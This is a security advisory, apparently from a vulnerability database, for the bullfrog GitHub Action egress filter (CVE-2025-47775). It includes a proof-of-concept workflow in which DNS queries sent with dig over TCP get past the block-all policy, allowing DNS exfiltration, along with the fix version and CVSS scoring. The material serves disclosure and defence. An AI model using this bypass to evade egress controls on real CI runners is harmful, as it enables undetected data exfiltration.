Early Access — Mondoo Vulnerability Intelligence is currently in preview.
Details
Summary
Using tcp breaks blocking and allows DNS exfiltration.
PoC
name: test
on:
push:
branches:
- "*"
jobs:
testBullFrog:
runs-on: ubuntu-22.04
steps:
- name: Use google dns
run: |
sudo resolvectl dns eth0 1.1.1.1
resolvectl status
- name: Set up bullfrog to block everything
uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
with:
egress-policy: block
allowed-domains: |
*.github.com
- name: Test connectivity
run: |
echo testing udp allowed ..
dig api.github.com @1.1.1.1 || :
echo testing tcp allowed ..
dig api.github.com @1.1.1.1 +tcp || :
echo testing udp not allowed
dig api.google.com @1.1.1.1 || :
echo testing tcp not allowed
dig api.google.com @1.1.1.1 +tcp || :
Impact
sandbox bypass
Affected Packages
GitHub Actionsbullfrogsec/bullfrog
Fixed in:
0.8.4References
ADVISORYhttps://github.com/advisories/GHSA-m32f-fjw2-37v3PACKAGEhttps://github.com/bullfrogsec/bullfrogWEBhttps://github.com/bullfrogsec/bullfrog/commit/ae7744ae4b3a6f8ffc2e49f501e30bf1a43d4671WEBhttps://github.com/bullfrogsec/bullfrog/releases/tag/v0.8.4WEBhttps://github.com/bullfrogsec/bullfrog/security/advisories/GHSA-m32f-fjw2-37v3ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-47775
Aliases
CVSS Analysis
CVSS v3.1
6.2
Exploitability
Attack Vector
Local
AV:LAttack Complexity
Low
AC:LPrivileges Required
None
PR:NUser Interaction
None
UI:NScope
Scope
Unchanged
S:UImpact
Confidentiality
High
C:HIntegrity
None
I:NAvailability
None
A:NCVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NRelated
Ecosystems
Timeline
PublishedMay 15, 2025
ModifiedMay 15, 2025